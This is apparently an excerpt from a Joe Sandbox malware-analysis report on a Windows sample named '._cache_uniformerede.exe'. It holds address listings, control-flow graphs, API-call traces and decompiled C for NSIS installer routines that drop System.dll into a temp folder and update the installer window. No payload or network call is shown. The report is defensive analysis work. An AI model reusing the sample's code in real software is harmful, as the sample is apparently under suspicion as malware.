                                                                                                                                                                                                                            0x00403313
                                                                                                                                                                                                                            0x00403318
                                                                                                                                                                                                                            0x0040331d
                                                                                                                                                                                                                            0x00403320
                                                                                                                                                                                                                            0x00403329
                                                                                                                                                                                                                            0x0040332d
                                                                                                                                                                                                                            0x00403335
                                                                                                                                                                                                                            0x0040333a
                                                                                                                                                                                                                            0x0040333c
                                                                                                                                                                                                                            0x0040333c
                                                                                                                                                                                                                            0x0040333c
                                                                                                                                                                                                                            0x00403344
                                                                                                                                                                                                                            0x00403344
                                                                                                                                                                                                                            0x00403347
                                                                                                                                                                                                                            0x00403348
                                                                                                                                                                                                                            0x00403348
                                                                                                                                                                                                                            0x0040334b
                                                                                                                                                                                                                            0x0040334d
                                                                                                                                                                                                                            0x0040334d
                                                                                                                                                                                                                            0x0040334d
                                                                                                                                                                                                                            0x00403350
                                                                                                                                                                                                                            0x00403357
                                                                                                                                                                                                                            0x00403363
                                                                                                                                                                                                                            0x00403368
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403368
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403320
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004032d4
                                                                                                                                                                                                                            0x00403262
                                                                                                                                                                                                                            0x0040326d
                                                                                                                                                                                                                            0x00403272
                                                                                                                                                                                                                            0x00403274
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040327d
                                                                                                                                                                                                                            0x00403280
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040315e
                                                                                                                                                                                                                            0x00403163
                                                                                                                                                                                                                            0x00403168
                                                                                                                                                                                                                            0x0040316c
                                                                                                                                                                                                                            0x00403173
                                                                                                                                                                                                                            0x00403178
                                                                                                                                                                                                                            0x0040317a
                                                                                                                                                                                                                            0x0040317c
                                                                                                                                                                                                                            0x0040317c
                                                                                                                                                                                                                            0x00403180
                                                                                                                                                                                                                            0x00403185
                                                                                                                                                                                                                            0x00403187
                                                                                                                                                                                                                            0x004032e0
                                                                                                                                                                                                                            0x00403322
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403322
                                                                                                                                                                                                                            0x0040318d
                                                                                                                                                                                                                            0x00403194
                                                                                                                                                                                                                            0x00403210
                                                                                                                                                                                                                            0x00403214
                                                                                                                                                                                                                            0x00403218
                                                                                                                                                                                                                            0x0040321d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403214
                                                                                                                                                                                                                            0x0040319d
                                                                                                                                                                                                                            0x004031a2
                                                                                                                                                                                                                            0x004031a5
                                                                                                                                                                                                                            0x004031aa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004031ac
                                                                                                                                                                                                                            0x004031b3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004031b5
                                                                                                                                                                                                                            0x004031bc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004031be
                                                                                                                                                                                                                            0x004031c5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004031c7
                                                                                                                                                                                                                            0x004031ce
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004031d0
                                                                                                                                                                                                                            0x004031d6
                                                                                                                                                                                                                            0x004031df
                                                                                                                                                                                                                            0x004031e5
                                                                                                                                                                                                                            0x004031e8
                                                                                                                                                                                                                            0x004031ea
                                                                                                                                                                                                                            0x004031f0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004031f6
                                                                                                                                                                                                                            0x004031fa
                                                                                                                                                                                                                            0x00403202
                                                                                                                                                                                                                            0x00403202
                                                                                                                                                                                                                            0x00403205
                                                                                                                                                                                                                            0x00403208
                                                                                                                                                                                                                            0x0040320a
                                                                                                                                                                                                                            0x0040320c
                                                                                                                                                                                                                            0x0040320c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040320a
                                                                                                                                                                                                                            0x004031fc
                                                                                                                                                                                                                            0x00403200
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040321e
                                                                                                                                                                                                                            0x0040321e
                                                                                                                                                                                                                            0x00403224
                                                                                                                                                                                                                            0x00403230
                                                                                                                                                                                                                            0x00403230
                                                                                                                                                                                                                            0x00403233
                                                                                                                                                                                                                            0x00403239
                                                                                                                                                                                                                            0x00403239
                                                                                                                                                                                                                            0x00403239
                                                                                                                                                                                                                            0x00403241
                                                                                                                                                                                                                            0x00403241
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403241

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004030E4
                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_uniformerede.exe,00000400), ref: 00403100
                                                                                                                                                                                                                              • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\._cache_uniformerede.exe,80000000,00000003), ref: 0040615C
                                                                                                                                                                                                                              • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\._cache_uniformerede.exe,C:\Users\user\Desktop\._cache_uniformerede.exe,80000000,00000003), ref: 00403149
                                                                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\._cache_uniformerede.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                            • API String ID: 2803837635-3216040775
                                                                                                                                                                                                                            • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                                                                                                                                                            • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 733 40176f-401794 call 402da6 call 405fae 738 401796-40179c call 406668 733->738 739 40179e-4017b0 call 406668 call 405f37 lstrcatW 733->739 745 4017b5-4017b6 call 4068ef 738->745 739->745 748 4017bb-4017bf 745->748 749 4017c1-4017cb call 40699e 748->749 750 4017f2-4017f5 748->750 758 4017dd-4017ef 749->758 759 4017cd-4017db CompareFileTime 749->759 752 4017f7-4017f8 call 406133 750->752 753 4017fd-401819 call 406158 750->753 752->753 760 40181b-40181e 753->760 761 40188d-4018b6 call 4056ca call 403371 753->761 758->750 759->758 762 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 760->762 763 40186f-401879 call 4056ca 760->763 775 4018b8-4018bc 761->775 776 4018be-4018ca SetFileTime 761->776 762->748 797 401864-401865 762->797 773 401882-401888 763->773 777 402c33 773->777 775->776 779 4018d0-4018db FindCloseChangeNotification 775->779 776->779 780 402c35-402c39 777->780 782 4018e1-4018e4 779->782 783 402c2a-402c2d 779->783 785 4018e6-4018f7 call 4066a5 lstrcatW 782->785 786 4018f9-4018fc call 4066a5 782->786 783->777 791 401901-402398 785->791 786->791 795 40239d-4023a2 791->795 796 402398 call 405cc8 791->796 795->780 796->795 797->773 798 401867-401868 797->798 798->763
                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                            			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668("C:\Users\hardz\AppData\Local\Temp\nsbCCFB.tmp", _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\hardz\AppData\Local\Temp\nsbCCFB.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, "C:\Users\hardz\AppData\Local\Temp\nsbCCFB.tmp");
						_t64 = E00405CC8("C:\Users\hardz\AppData\Local\Temp\nsbCCFB.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8)); // executed
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}


















                                                                                                                                                                                                                            0x0040176f
                                                                                                                                                                                                                            0x00401776
                                                                                                                                                                                                                            0x00401782
                                                                                                                                                                                                                            0x00401785
                                                                                                                                                                                                                            0x0040178a
                                                                                                                                                                                                                            0x0040178d
                                                                                                                                                                                                                            0x00401794
                                                                                                                                                                                                                            0x004017b0
                                                                                                                                                                                                                            0x00401796
                                                                                                                                                                                                                            0x00401797
                                                                                                                                                                                                                            0x00401797
                                                                                                                                                                                                                            0x004017b6
                                                                                                                                                                                                                            0x004017bb
                                                                                                                                                                                                                            0x004017bb
                                                                                                                                                                                                                            0x004017bf
                                                                                                                                                                                                                            0x004017c2
                                                                                                                                                                                                                            0x004017c7
                                                                                                                                                                                                                            0x004017c9
                                                                                                                                                                                                                            0x004017cb
                                                                                                                                                                                                                            0x004017d0
                                                                                                                                                                                                                            0x004017d0
                                                                                                                                                                                                                            0x004017db
                                                                                                                                                                                                                            0x004017db
                                                                                                                                                                                                                            0x004017ec
                                                                                                                                                                                                                            0x004017ee
                                                                                                                                                                                                                            0x004017ee
                                                                                                                                                                                                                            0x004017ef
                                                                                                                                                                                                                            0x004017ef
                                                                                                                                                                                                                            0x004017f2
                                                                                                                                                                                                                            0x004017f5
                                                                                                                                                                                                                            0x004017f8
                                                                                                                                                                                                                            0x004017f8
                                                                                                                                                                                                                            0x004017ff
                                                                                                                                                                                                                            0x0040180e
                                                                                                                                                                                                                            0x00401813
                                                                                                                                                                                                                            0x00401816
                                                                                                                                                                                                                            0x00401819
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040181b
                                                                                                                                                                                                                            0x0040181e
                                                                                                                                                                                                                            0x00401874
                                                                                                                                                                                                                            0x00401879
                                                                                                                                                                                                                            0x004015b6
                                                                                                                                                                                                                            0x0040292e
                                                                                                                                                                                                                            0x0040292e
                                                                                                                                                                                                                            0x00402c2a
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00401820
                                                                                                                                                                                                                            0x00401826
                                                                                                                                                                                                                            0x0040182d
                                                                                                                                                                                                                            0x0040183a
                                                                                                                                                                                                                            0x00401845
                                                                                                                                                                                                                            0x0040185b
                                                                                                                                                                                                                            0x0040185b
                                                                                                                                                                                                                            0x0040185e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00401864
                                                                                                                                                                                                                            0x00401864
                                                                                                                                                                                                                            0x00401865
                                                                                                                                                                                                                            0x00401882
                                                                                                                                                                                                                            0x00402c33
                                                                                                                                                                                                                            0x00402c33
                                                                                                                                                                                                                            0x00402c33
                                                                                                                                                                                                                            0x00401867
                                                                                                                                                                                                                            0x00401867
                                                                                                                                                                                                                            0x00401868
                                                                                                                                                                                                                            0x00401493
                                                                                                                                                                                                                            0x0040239d
                                                                                                                                                                                                                            0x0040239d
                                                                                                                                                                                                                            0x0040239d
                                                                                                                                                                                                                            0x00401865
                                                                                                                                                                                                                            0x0040185e
                                                                                                                                                                                                                            0x00402c35
                                                                                                                                                                                                                            0x00402c39
                                                                                                                                                                                                                            0x00402c39
                                                                                                                                                                                                                            0x00401892
                                                                                                                                                                                                                            0x00401897
                                                                                                                                                                                                                            0x004018a5
                                                                                                                                                                                                                            0x004018aa
                                                                                                                                                                                                                            0x004018b0
                                                                                                                                                                                                                            0x004018b4
                                                                                                                                                                                                                            0x004018b6
                                                                                                                                                                                                                            0x004018be
                                                                                                                                                                                                                            0x004018ca
                                                                                                                                                                                                                            0x004018b8
                                                                                                                                                                                                                            0x004018b8
                                                                                                                                                                                                                            0x004018bc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004018bc
                                                                                                                                                                                                                            0x004018d3
                                                                                                                                                                                                                            0x004018d9
                                                                                                                                                                                                                            0x004018db
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004018e1
                                                                                                                                                                                                                            0x004018e1
                                                                                                                                                                                                                            0x004018e4
                                                                                                                                                                                                                            0x004018fc
                                                                                                                                                                                                                            0x004018e6
                                                                                                                                                                                                                            0x004018e9
                                                                                                                                                                                                                            0x004018f2
                                                                                                                                                                                                                            0x004018f2
                                                                                                                                                                                                                            0x00401901
                                                                                                                                                                                                                            0x00401906
                                                                                                                                                                                                                            0x00402398
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402398
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                              • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,004030A8), ref: 00405725
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll), ref: 00405737
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp$C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll$Call
                                                                                                                                                                                                                            • API String ID: 1941528284-190955987
                                                                                                                                                                                                                            • Opcode ID: 399e8552882e80e4b3524515d38fd94e295efdac2a56a00d8f68241b5a4a94ca
                                                                                                                                                                                                                            • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 399e8552882e80e4b3524515d38fd94e295efdac2a56a00d8f68241b5a4a94ca
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 799 4056ca-4056df 800 4056e5-4056f6 799->800 801 405796-40579a 799->801 802 405701-40570d lstrlenW 800->802 803 4056f8-4056fc call 4066a5 800->803 804 40572a-40572e 802->804 805 40570f-40571f lstrlenW 802->805 803->802 808 405730-405737 SetWindowTextW 804->808 809 40573d-405741 804->809 805->801 807 405721-405725 lstrcatW 805->807 807->804 808->809 810 405743-405785 SendMessageW * 3 809->810 811 405787-405789 809->811 810->811 811->801 812 40578b-40578e 811->812 812->801
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                                                                                                                                                                                            0x004056d0
                                                                                                                                                                                                                            0x004056da
                                                                                                                                                                                                                            0x004056df
                                                                                                                                                                                                                            0x004056e5
                                                                                                                                                                                                                            0x004056f0
                                                                                                                                                                                                                            0x004056f3
                                                                                                                                                                                                                            0x004056f6
                                                                                                                                                                                                                            0x004056fc
                                                                                                                                                                                                                            0x004056fc
                                                                                                                                                                                                                            0x00405702
                                                                                                                                                                                                                            0x0040570a
                                                                                                                                                                                                                            0x0040570d
                                                                                                                                                                                                                            0x0040572a
                                                                                                                                                                                                                            0x0040572e
                                                                                                                                                                                                                            0x00405737
                                                                                                                                                                                                                            0x00405737
                                                                                                                                                                                                                            0x00405741
                                                                                                                                                                                                                            0x0040574a
                                                                                                                                                                                                                            0x00405756
                                                                                                                                                                                                                            0x0040575d
                                                                                                                                                                                                                            0x00405761
                                                                                                                                                                                                                            0x00405764
                                                                                                                                                                                                                            0x00405777
                                                                                                                                                                                                                            0x00405785
                                                                                                                                                                                                                            0x00405785
                                                                                                                                                                                                                            0x00405789
                                                                                                                                                                                                                            0x0040578b
                                                                                                                                                                                                                            0x0040578e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040578e
                                                                                                                                                                                                                            0x0040570f
                                                                                                                                                                                                                            0x00405717
                                                                                                                                                                                                                            0x0040571f
                                                                                                                                                                                                                            0x00405725
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405725
                                                                                                                                                                                                                            0x0040571f
                                                                                                                                                                                                                            0x0040570d
                                                                                                                                                                                                                            0x0040579a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,004030A8), ref: 00405725
                                                                                                                                                                                                                            • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll), ref: 00405737
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                                                                                                                              • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                                                                                                                                              • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000), ref: 004068A4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
